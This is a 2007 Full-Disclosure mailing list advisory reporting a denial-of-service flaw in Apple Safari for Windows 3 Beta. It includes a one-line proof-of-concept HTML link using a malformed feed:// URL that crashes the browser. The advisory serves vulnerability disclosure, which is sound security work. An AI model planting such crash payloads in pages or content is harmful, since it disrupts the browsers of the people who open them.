[Full-disclosure] Apple Safari for Windows feed:// URL Denial of Service Vulnerability
Trancer
mtrancer at gmail.com
Wed Jun 13 01:42:02 BST 2007
Apple Safari for Windows feed:// URL Denial of Service Vulnerability
Versions: Apple Safari For Windows 3 Beta
Apple Safari for Windows is prone to a denial-of-service vulnerability
because it fails to properly handle crafted feed:// link.
Proof-of-Concept: .
Link: feed://%
Exploit: <a href="feed://%">DoS</a>
Yes, this will crash Safari. Yes, it's that easy.
Note that this doesn't work with http://, ftp://, gopher:// and etc'.
Reference:
http://www.rec-sec.co.il/2007/06/12/apple-safari-for-windows-vulnerabilities/#exp
Credit:
Moshe Ben-Abu of BugSec is credited with discovering this vulnerability.
Vendor has been notified.
--
Moshe Ben-Abu :: Trancer
0nly Human...
Full-Disclosure is hosted and sponsored by Secunia.